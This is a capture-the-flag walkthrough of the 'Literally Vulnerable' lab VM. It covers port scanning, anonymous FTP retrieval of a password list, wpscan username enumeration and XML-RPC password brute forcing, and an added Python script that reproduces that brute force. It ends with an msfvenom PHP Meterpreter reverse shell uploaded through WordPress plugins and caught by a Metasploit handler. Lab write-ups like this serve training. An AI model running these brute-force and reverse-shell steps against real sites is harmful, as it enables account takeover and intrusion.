Literally Vulnerable lab


Start the lab VM in VMware.

Probing the IP address

First run ifconfig on the attacking machine to find the address of the VM network adapter.

Use nmap to discover live hosts on that subnet.

This identifies 192.168.146.128 as the lab host.

Probing port information

Use nmap to scan all TCP ports of the lab host with service and OS detection:

nmap -p- -A 192.168.146.128
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-15 01:25 CST
Nmap scan report for literally.vulnerable (192.168.146.128)
Host is up (0.00059s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 ftp ftp 325 Dec 04 13:05 backupPasswords
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.146.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2f:26:5b:e6:ae:9a:c0:26:76:26:24:00:a7:37:e6:c1 (RSA)
| 256 79:c0:12:33:d6:6d:9a:bd:1f:11:aa:1c:39:1e:b8:95 (ECDSA)
|_ 256 83:27:d3:79:d0:8b:6a:2a:23:57:5b:3c:d7:b4:e5:60 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-generator: WordPress 5.3
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Not so Vulnerable – Just another WordPress site
|_http-trane-info: Problem with XML parsing of /evox/about
65535/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 00:0C:29:01:26:7B (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.58 ms literally.vulnerable (192.168.146.128)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.60 seconds

The nmap output shows that port 21 allows anonymous login and that the FTP root holds a file named backupPasswords; that file is the password list used later.

That wraps up port 21.

Open port 80; the home page shows the site runs WordPress.

Nothing useful turned up here, so move on to port 65535.

Directory brute forcing turned up the phpcms directory (my own wordlist did not find it, so it is clearly too weak). Run wpscan against it to enumerate usernames as well:

wpscan --url http://192.168.146.128:65535/phpcms/ --enumerate u
......
[+] notadmin
| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] maybeadmin
| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

Two usernames exist, notadmin and maybeadmin. Using the backupPasswords list from port 21 as the wordlist, wpscan brute forces the login and recovers maybeadmin's password:

wpscan --url http://192.168.146.128:65535/phpcms/ -e u -P pass_wp.txt
[+] maybeadmin
| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] notadmin
| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] Performing password attack on Xmlrpc against 2 user/s
[SUCCESS] - maybeadmin / $EPid%J2L9LufO5
Trying notadmin / SCb$I^gDDqE34fA Time: 00:00:00 <==========> (19 / 19) 100.00% Time: 00:00:00
[i] Valid Combinations Found:
| Username: maybeadmin, Password: $EPid%J2L9LufO5
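The wpscan run above reports "Performing password attack on Xmlrpc". The following added example, written for this page and not taken from the write-up or from wpscan, shows what that attack does: WordPress exposes /xmlrpc.php, and the wp.getUsersBlogs method has to authenticate before it returns anything, so every call is a yes/no oracle for one username/password pair. The URL, usernames and the two passwords are the ones from the write-up; the XML-RPC responses and the "password" filler entry are constructed samples, and send_live is a hypothetical helper that is only used when the script is run against a real target.

```python
"""Reproducing wpscan's XML-RPC password check by hand (added example)."""
import urllib.request
import xmlrpc.client
from typing import Callable, List, Optional

# Target from the write-up: the WordPress instance under /phpcms/ on port 65535.
XMLRPC_URL = "http://192.168.146.128:65535/phpcms/xmlrpc.php"


def build_login_check(username: str, password: str) -> bytes:
    """Body of one password guess: a single wp.getUsersBlogs call."""
    body = xmlrpc.client.dumps((username, password), methodname="wp.getUsersBlogs")
    return body.encode()


def credentials_valid(response_body: bytes) -> bool:
    """True if the response carries the user's blog list, False on an auth fault.

    A wrong password comes back as a <fault> with faultCode 403 and
    "Incorrect username or password."; loads() raises xmlrpc.client.Fault
    for it. Any other fault is not an authentication verdict, so re-raise.
    """
    try:
        (blogs,), _ = xmlrpc.client.loads(response_body.decode())
    except xmlrpc.client.Fault as fault:
        if fault.faultCode == 403:
            return False
        raise  # XML-RPC disabled, WAF, plugin interference: not a verdict
    return isinstance(blogs, list)


def first_valid_password(
    username: str, candidates: List[str], send: Callable[[bytes], bytes]
) -> Optional[str]:
    """Try each candidate through send(body) -> response bytes, stop at the first hit."""
    for password in candidates:
        if credentials_valid(send(build_login_check(username, password))):
            return password
    return None


def send_live(body: bytes, url: str = XMLRPC_URL) -> bytes:
    """Hypothetical helper: POST one request to the real target (needs network)."""
    req = urllib.request.Request(url, data=body, headers={"Content-Type": "text/xml"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read()


# Constructed sample responses in WordPress's XML-RPC format (not captured traffic).
FAULT_RESPONSE = b"""<?xml version="1.0"?>
<methodResponse><fault><value><struct>
<member><name>faultCode</name><value><int>403</int></value></member>
<member><name>faultString</name><value><string>Incorrect username or password.</string></value></member>
</struct></value></fault></methodResponse>"""

SUCCESS_RESPONSE = b"""<?xml version="1.0"?>
<methodResponse><params><param><value><array><data>
<value><struct>
<member><name>isAdmin</name><value><boolean>0</boolean></value></member>
<member><name>url</name><value><string>http://192.168.146.128:65535/phpcms/</string></value></member>
<member><name>blogid</name><value><string>1</string></value></member>
<member><name>blogName</name><value><string>constructed sample</string></value></member>
</struct></value>
</data></array></value></param></params></methodResponse>"""


def fake_server(username: str, good_password: str) -> Callable[[bytes], bytes]:
    """Offline stand-in for send_live that answers the way WordPress does."""
    def send(body: bytes) -> bytes:
        (user, password), method = xmlrpc.client.loads(body.decode())
        assert method == "wp.getUsersBlogs"
        ok = (user, password) == (username, good_password)
        return SUCCESS_RESPONSE if ok else FAULT_RESPONSE
    return send


if __name__ == "__main__":
    # "password" is a constructed filler; the other two entries are from the write-up.
    wordlist = ["password", "$EPid%J2L9LufO5", "SCb$I^gDDqE34fA"]
    oracle = fake_server("maybeadmin", "$EPid%J2L9LufO5")  # swap in send_live for a real run
    print("maybeadmin ->", first_valid_password("maybeadmin", wordlist, oracle))
```

Run as-is it only talks to the in-process fake server; passing send_live instead of the fake makes one HTTP request per guess against the lab host. Note that XML-RPC logins bypass the wp-login form, so a lockout plugin that only watches wp-login.php will not see them. wpscan also offers an xmlrpc-multicall mode that packs many guesses into one system.multicall request, but current WordPress stops checking credentials within a multicall after the first failure, so against a current install one call per guess, as above, is what actually works.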

Upload shell

After logging in, one of the posts contains notadmin's password, Pa$$w0rd13!&. Logging in as notadmin shows that it is the WordPress administrator account.

Upload a shell; here I used a Metasploit PHP Meterpreter payload:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.146.131 LPORT=1234 -f raw >shell.php

Upload the shell through the WordPress plugin upload page.

The upload succeeds and the file is saved at /phpcms/wp-content/uploads/2019/12/shell.php

Now set up the Metasploit listener:

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.146.131
set lport 1234
run

Then request the uploaded shell.php in a browser or with curl; the payload connects back and the handler returns a Meterpreter session.

I still need to study the privilege escalation part; I'm too much of a noob......
